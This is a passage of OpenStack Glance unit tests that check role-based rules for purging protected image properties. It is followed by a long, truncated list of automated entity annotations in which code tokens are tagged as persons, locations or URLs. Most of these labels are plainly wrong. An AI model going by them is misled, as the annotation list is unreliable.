'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertNotIn('x_owner_foo', res_body['properties'])
self.assertNotIn('admin_foo', res_body['properties'])
def test_delete_protected_props_mix_read(self):
"""
Create an image with two props - one readable/deletable by admin, but
also readable by spl_role. The other is readable/deletable by
spl_role. Verify spl_role is forbidden to purge_props in this scenario
without retaining the readable prop.
"""
custom_props = {
'x-image-meta-property-spl_read_only_prop': '1',
'x-image-meta-property-spl_delete_prop': '2'
}
image_id = self._create_admin_image(custom_props)
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 403)
| 119,145 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2010-2011'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'db_api'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'CONF\n\n_'], ['PERSON', 'TestGlanceAPI(base'], ['PERSON', 'FIXTURES'], ['PERSON', 'FIXTURES'], ['LOCATION', 'self.test_dir'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'qcow2'], ['PERSON', 'qcow2'], ['PERSON', 'FIXTURES'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'Request.blank("/images/%s'], ['URL', 'req.ge'], ['PERSON', 'test_show_non_exists_image(self'], ['NRP', 'memb_list'], ['NRP', 'memb_list'], ['PERSON', 'FakeAuthMiddleware'], ['NRP', 'memb_list'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'api = test_utils'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['PERSON', 'api = test_utils'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'ImageSerializer'], ['PERSON', '678911234'], ['PERSON', 'marche'], ['PERSON', 'FIXTURE'], ['PERSON', 'FIXTURE'], ['PERSON', 'FIXTURE'], ['DATE_TIME', '19'], ['DATE_TIME', '19'], ['PERSON', 'copy_image_meta = copy.deepcopy(image_meta'], ['PERSON', 'copy_image_meta = copy.deepcopy(image_meta'], ['LOCATION', 'TestFilterValidator(base'], ['LOCATION', 'TestAPIProtectedProps(base'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', "http://example.com/image.tar.gz',"], ['URL', "http://example.com/image.tar.gz',"], ['URL', "http://example.com/images/123'"], ['URL', "http://glance.com/i.ovf',"], ['URL', "http://glance.com/i.ovf',"], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'oslo.co'], ['URL', 'glance.api.com'], ['URL', 'glance.com'], ['URL', 'glance.common.co'], ['URL', 'glance.co'], ['URL', 'glance.openstack.com'], ['URL', 'glance.openstack.com'], ['URL', 'glance.store.fi'], ['URL', 'cfg.CO'], ['URL', 'uuidutils.ge'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.ma'], ['URL', 'self.FI'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'self.de'], ['URL', 'self.cr'], ['URL', 'self.de'], ['URL', 'self.FI'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'models.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'CONF.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'StringIO.St'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.stubs.Se'], ['URL', 'glance.api.v1.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'missing.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'six.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'missing.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'CONF.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'StringIO.St'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'timeutils.is'], ['URL', 'dt1.st'], ['URL', 'dt1.st'], ['URL', 'dt1.st'], ['URL', 'timeutils.is'], ['URL', 'ts.st'], ['URL', 'ts.st'], ['URL', 'timeutils.is'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'detail.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'images.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'members.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'record.ke'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.bo'], ['URL', 'res.bo'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'headers.it'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'headers.ke'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'header.it'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.body.fi'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'header.it'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.se'], ['URL', 